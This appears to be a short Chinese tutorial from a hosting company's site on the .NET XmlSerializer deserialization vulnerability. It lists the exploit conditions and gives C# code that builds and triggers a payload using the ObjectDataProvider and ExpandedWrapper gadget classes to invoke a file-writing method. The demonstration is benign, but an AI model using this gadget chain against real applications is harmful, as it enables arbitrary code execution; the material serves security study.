意见箱
恒创运营部门将仔细参阅您的意见和建议,必要时将通过预留邮箱与您保持联络。感谢您的支持!
意见/建议
提交建议

.Net反序列化漏洞XmlSerializer的示例分析

来源:恒创科技 编辑:恒创科技编辑部
2023-12-02 02:21:59

小编今天带大家了解.Net反序列化漏洞XmlSerializer的示例分析,文中知识点介绍的非常详细。觉得有帮助的朋友可以跟着小编一起浏览文章的内容,希望能够帮助更多想解决这个问题的朋友找到问题的答案,下面跟着小编一起深入学习“.Net反序列化漏洞XmlSerializer的示例分析”的知识吧。

条件:

初始化对象时,类型可控:new XmlSerializer(type可控)


.Net反序列化漏洞XmlSerializer的示例分析

反序列化对象时,输入内容可控:serializer.Deserialize(fi可控)

两个关键类:ObjectDataProvider, ExpandedWrapper

//PresentationFramework.dll  v4.0.0.0System.Windows.Data.ObjectDataProvider//System.Data.Services.dll   v4.0.0.0System.Data.Services.Internal.ExpandedWrapper

Payload生成:

        public static void serializeObjectWithXmlSer()        {            ExpandedWrapper<Class2, ObjectDataProvider> eobj = new ExpandedWrapper<Class2,ObjectDataProvider>();            XmlSerializer serializer = new XmlSerializer(typeof(ExpandedWrapper<Class2, ObjectDataProvider>));            eobj.ProjectedProperty0 = new ObjectDataProvider();            eobj.ProjectedProperty0.ObjectInstance = new Class2();            eobj.ProjectedProperty0.MethodName = "writeFile";            eobj.ProjectedProperty0.MethodParameters.Add("xxxxx");            eobj.ProjectedProperty0.MethodParameters.Add("ser.txt");            TextWriter fo = new StreamWriter("d:/tmp/xmlser.txt");            serializer.Serialize(fo, eobj);            fo.Close();        }

触发Payload:

        public static void deserializeObjectWithXmlSer()        {            XmlSerializer ser = new XmlSerializer(typeof(ExpandedWrapper<Class2, ObjectDataProvider>));            TextReader fi = new StreamReader("d:/tmp/xmlser.txt");            ser.Deserialize(fi);            fi.Close();        }

感谢大家的阅读,以上就是“.Net反序列化漏洞XmlSerializer的示例分析”的全部内容了,学会的朋友赶紧操作起来吧。相信恒创小编一定会给大家带来更优质的文章。谢谢大家对恒创网站的支持!

上一篇: mysql直接拷贝data目录下数据库源文件还原数据库方法 下一篇: 工业防火墙架构与技术中的硬件架构是怎样的